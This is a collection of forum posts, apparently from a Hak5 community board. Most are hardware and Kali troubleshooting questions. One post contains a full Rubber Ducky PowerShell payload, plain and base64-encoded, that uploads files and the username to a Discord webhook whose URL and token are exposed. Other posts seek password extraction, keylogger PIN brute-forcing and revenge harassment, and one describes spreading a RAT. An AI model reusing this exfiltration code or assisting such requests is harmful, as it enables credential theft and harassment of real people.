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  1. I Know this is a stupid question but i have no option i successfully copied the helloword in my sd card then i inserted the sd in my rubber ducky and i inserted the ducky in my usb port and i got the desired out put, but now i am unable to remove the sd card , the ducky seems to be very delicate so i don't want to risk anything, can some one instruct me the correct way on how to remove the sd card from the ducky
  2. So im looking for guidance here. In my PowerShell script I use a function, it exports a file/ text to a discord webhook. When pasted into PowerShell, the function works fine. But when I convert it to a ducky script I get some errors that I don't get before. Here's the weird thing, when I encode the ducky script with base64, there's no spaces or formatting and it works fine. So I would assume its some type of formatting in my ducky script that is causing the error. When its encoded, I cannot reference other variables from outside the function so I need it to work in plain text. Anything helps. PS Script: function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'my discord webhook' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } Converted to ducky: DELAY 2000 GUI r DELAY 2000 STRING powershell DELAY 250 ENTER DELAY 2000 STRING function Upload-Discord { STRING STRING [CmdletBinding()] STRING param ( STRING [parameter(Position=0,Mandatory=$False)] STRING [string]$file, STRING [parameter(Position=1,Mandatory=$False)] STRING [string]$text STRING ) STRING STRING $hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI' STRING STRING $Body = @{ STRING 'username' = $env:username STRING 'content' = $text STRING } STRING STRING if (-not ([string]::IsNullOrEmpty($text))){ STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; STRING STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} STRING } STRING Converted to ducky (Encoded) works fine for some reason?: DELAY 2000 GUI r DELAY 2000 STRING powershell DELAY 250 ENTER DELAY 250 STRING powershell -enc ' DELAY 250 STRING ZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQALQBEAGkAcwBjAG8AcgBkACAAewANAAoADQAKAFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQANAAoAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMAAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAGYAaQBsAGUALAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMQAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAHQAZQB4AHQAIAANAAoAKQANAAoADQAKACQAaABvAG8AawB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBkAGkAcwBjAG8AcgBkAC4AYwBvAG0ALwBhAHAAaQAvAHcAZQBiAGgAbwBvAGsAcwAvADEAMQA5ADQAMgAxADUANQA0ADQAMwA0ADIAMQA5ADYAMgA3ADUALwBkAGcARgBsAGwANwBYAFAALQBtAEwAUwBpAE4AVwBIAHgAVQBvAEYAawBTAHAAdQBLAFQANgAyAFUAZgA1AEcATgAtAF8ASQBsAGMAdQBCADQAVgBrAG4AegBXAGsAeQA5AFUAdwBBAGwAUABvAFEAUgBlAHoAeAB6AEwAbwBJAFcAUgBKAEkAJwANAAoADQAKACQAQgBvAGQAeQAgAD0AIABAAHsADQAKACAAIAAnAHUAcwBlAHIAbgBhAG0AZQAnACAAPQAgACQAZQBuAHYAOgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAnAGMAbwBuAHQAZQBuAHQAJwAgAD0AIAAkAHQAZQB4AHQADQAKAH0ADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAdABlAHgAdAApACkAKQB7AA0ACgBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuAC8ASgBzAG8AbgAnACAALQBVAHIAaQAgACQAaABvAG8AawB1AHIAbAAgACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEIAbwBkAHkAIAAoACQAQgBvAGQAeQAgAHwAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AKQB9ADsADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAZgBpAGwAZQApACkAKQB7AGMAdQByAGwALgBlAHgAZQAgAC0ARgAgACIAZgBpAGwAZQAxAD0AQAAkAGYAaQBsAGUAIgAgACQAaABvAG8AawB1AHIAbAB9AA0ACgB9AA0ACgANAAoA' ENTER PS Errors: PS C:\WINDOWS\system32> function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandatory=$False)]`n[string]$text `n)`n`n$hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'username' = $env:username`n'content' = $text`n}`n`nif (-not ([string]::IsNullOrEmpty($text))){`nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};`n`nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING At line:1 char:45 + function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(P ... + ~ An expression was expected after '('. At line:1 char:79 + ... scord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandator ... + ~ Missing argument in parameter list. At line:1 char:137 + ... =0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandator ... + ~ Missing argument in parameter list. At line:1 char:327 + ... puKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'usern ... + ~ The hash literal was incomplete. At line:1 char:621 + ... IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING + ~ Unexpected token '}' in expression or statement. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ExpectedExpression PS C:\WINDOWS\system32> Upload-Discord -file "$dir\output.txt" Upload-Discord : The term 'Upload-Discord' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Upload-Discord -file "$dir\output.txt" + ~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Upload-Discord:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException PS PIC: https://ibb.co/tXpxLmc
  3. Hey Hak5 community, I hope this message finds you well. I wanted to bring up a critical issue regarding the use of the Rubber Ducky with the latest hardware version. It has come to my/our(I dont want to speak for others) attention that using the old firmwares on the new Rubber Ducky can lead to bricking the device. Considering the potential risks involved, I'd like to suggest that the Hak5 team releases a new firmware version along with an updated firmware flasher specifically designed for the new hardware. This will not only address the existing issue but also ensure a smooth and secure user experience. I understand that the Hak5 team is always working hard to improve and enhance the tools we all love, and your attention to this matter is highly appreciated. So if you have time please do it. Also share your thoughts and experiences on this topic, and let's collaborate to make the Rubber Ducky experience as seamless as possible for everyone. Looking forward to hearing from the community and the Hak5 team. Best regards, A User
  4. Hi, Im interested in the WiFi Pineapple but idk if it ships to Bulgaria. Cuz when i try to order it says "This order can’t be shipped to the address you entered. Review your address to ensure that all fields have been entered correctly and try again.". Pls if tell me what should i do in this situation cuz it says it can be shipped to EU.
  5. Hello, I accidentally set .bin files to open in notepad on windows 10. I can't fix it for the life of me. I've tried resetting the associated file types to default but they don't affect .bin files. I tried to reg edit .bin under hkey_classes_root.bin and set it to default ("%1"%* I think this is default anyway) but that isn't working either. Any help or guidance would be greatly appreciated = )
  6. Hello, I have recently purchased my wifipineapple. the first day I was able to load bulletins and follow the hak5 setup tutorial but now (the next day) I am unable to load bulletins, check for updates, or load modules from wifipineapple.com. Also, I am running on windows 10 on the Acer aspire e15. I have followed the setup tutorial and everything is configured correctly so i don't understand.
  7. Hi all, I have an Pineapple Mark V from school and need to do a demo. But I can't install modules to the sd card. Infact I dont see the option... If have seen some fixen like a diffrent sd card, change some config but I dont have the wirte access??( when logged in as root) I have formated the sd card using the webbrowser, in linux and sd formatter in Windows 10 Can you guys tell me here what to do? or just try another sd card?
  8. Hi guys, I have a problem: I want to hack my Wifi but all the attacks which I found only worked for WPS 1.0 but not on my WPS 2.0. Of course I am open minded for other ways to hack my wifi but none of the attacks which I found worked.🙄😞
  9. Alright, so a friend gave me a USB hardware keylogger... the catch is that he doesn't remember the PIN. It's completely useless without the PIN since you need it to read stored keystrokes. So my idea is to use a rubber ducky to brute force in. The issue is that I'm not a programmer, and typing out every combination is not really worth it. So i was hoping that someone with some programming know how could send me a script, or a program to generate it. The keylogger PIN uses 3 digits, A-Z and 0-9 It works like a modifier key (Shift, Ctrl, Alt) so if the PIN was "ABC" then you would need to hold "A" then hold "B" then press "C" and release. Thanks to anyone who helps 😊
  10. I got my rubber ducky for about two days ago I played around with it and decided to get twin duck on there. I did so use a tutorial. when I was done I tried plugging it in and it started flashing red and green and I regret doing it now because I can't use it. Is there any way to fix it or reset the rubber ducky so I can start over again.
  11. Im trying to download Kali linux on my brand new Chormebook(ASUS). I started by downloading crouton and setting that up, next i go to the crosh and type: shell sudo sh -e ~/Downloads/crouton -r kali-rolling -t xfce than it said a buch of stuff than at the end said Failed to complete chroot setup.
  12. I went to boot up my computer this morning and it began trying to start but then couldn't and then shuts back off, followed immediately but trying to boot again. It repeats this process endlessly if I don't cut the power. I'm pretty sure its a motherboard issue and i plan on disconnecting and reconnecting essentially everything and giving the internals a good cleaning with a can of air tomorrow. I really just want a second opinion on the situation from people that are more experienced with this sort of stuff than I am. I have a 30 second video of what's happening via mega upload if you like, thanks in advance! https://mega.nz/#!RPBSgYxb!1RYQsVPR-P2mjk_spCN4oRWraaDF6m51xuGyt8k76tk
  13. I need some help from someone. Someone raped my girlfriend and now i got his number. I would like to talk someone who can help me have revenge. i would love to destroy this number and bother him. contact me if u want to help.
  14. Hey, I just reinstalled Kali Linux KDE on my machine, and I have problems with putting some widgets on the desktop and panel (like the system tray) and I can't right click on the desktop to add a panel. Can someone help me?
  15. Hello everyone, I wanted to connect my beautiful Pineapple Wifi Mark V in the cigarette lighter of the car, unfortunately it is disconnected and reconnected several times. Since the Mark V lights up more and it gives off a smell of burnt component, so I opened the markV and I see that a piece burned, do you know if it is possible to repair or I have more than to buy a new pineapple wifi? Thank you in advance for your answers is for my first topic on the forum, besides I want to thank the members of Hack5 because their wifi pineapple is very well made. I put some pictures of the burned component , The concern is at the level of the components behind the leds . Thanks in advance and sorry for my english i use google translate :/
  16. bethel


    Hello, Everyone! I am using tunnelbear which is good but while downloading from torrent not satisfied with it may be due to free services but I want to know which one is good for torrenting and gaming. Actually confused to use paid vpn service. When I was wondering on google its show many results but I want know the user reviews here share one article for example is there any vpn good? check it here: https://www.reviewsdir.com/best-vpn-for-torrenting/ and sorry for my bad english
  17. Hello, good morning, I have a problem with my Wifi Pineapple happens to the firmware update (upgrade-3.0.0) and all the normal procedure but my pineapple was only with the green LED on and I can not do anything. How could I solve this problem? Thanks. I can not access does not leave me not for SSH or linux by any side that I can do in this case? Since the only thing that makes the Pineapple is to turn on the green led and remains there without giving an answer.
  18. Ok so I have made my self a live usb to boot kali off of, it boots correctly first time great! but then I notice my built in mac book pro 2017 keyboard does'nt work. Along with the touch pad. any ideas Thx, cam
  19. Hey there, i recently bought a ducky for xmas and am trying to set it up. I didnt want to use linux for the firmware which i now think was a mistake as i have no idea how to fix the firmware that is on it now. I dont know what is wrong with it but i installed some twin duck software from this tuitorial url: https://www.youtube.com/watch?v=8cUeRCBQvng The problem i have is my windows machine will not recognise my ducky so i want to reset to factory settings and encode from linux. any help would be appreciated.
  20. Lol hey im pretty new to "hacking " so is there any specific place to start all ive basically done so far is make a line of code that pings a website over and over in an attempt to crash it it didn't work tho only slowed it down. And i also made that matrix thing aswell aswell as .bat file to instantly transfer files off a memory stick so i know a bit of bat bit of c and c++ aswell as java so bit of a bunch i just dont know where to start now
  21. I have tried so hard to get my ducky working but it just wont. I have reflashed it so many times and it works once then goes red and doesnt recognize the ducky or sd card or anything and i have to reflash it again. The second i remove it and plug it in it goes red. Please help.
  22. Hey, I ordered the beautiful USB rubber ducky and its working flawlessly. On windows its easy as copy-pasterino seeing how ducktoolkit is crazy good. I have one wish tho, and seeing how thats possible on windows, i dont see why it should be possible on mac. I want to be able to find a passord on a mac computer, on safari, chrome or firefox, does not matter. The password I am looking for is to a website. Also a quick question, I installed dropbox and my computer automatically logs in to the dropbox program, which is great. Just wondering where that password is saved..? Gonna be trying that on this device, and if it does not work ill try my look on the wifi pineapple nano, just got it today. :D Thank you guys!
  23. I have tried so hard to get my ducky working but it just wont. I have reflashed it so many times and it works once then goes red and doesnt recognize the ducky or sd card or anything and i have to reflash it again. The second i remove it and plug it in it goes red. Please help.
  24. Hello, something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRar File and wanted to troll some of my friends with. I send the file in the chat of my discord server (similar to Teamspeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the discord were online) anymore, I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it). The Computer had an IP from the USA (doesn't have to be true, it show that I'm from England even tho I have a German IP) and had no Antivirus installed. The name of it was something with a C at the beginning, and a y and an o (don't remember it exactly). I wanted to know who that was and opened the windows to the screen. He had some old version of Windows installed which I didn't know (its the one with the gray taskbar, pretty basic). There was a command prompt running, which had a python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list. I didn't use any protection like VPN or a firewall at that moment. After that, I got really scared for some reason and turned off my computer. Does someone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a discord server ran the file? I really need your help ;) Cheers, contrix_ PS: Sry for my bad English, I'm German and just 14 years old as you probably already assumed by my writing ^^ PPS: While writing this text I overwrote my text two times, even tho I don't think I touched the insert button. I'm getting really paranoid xD
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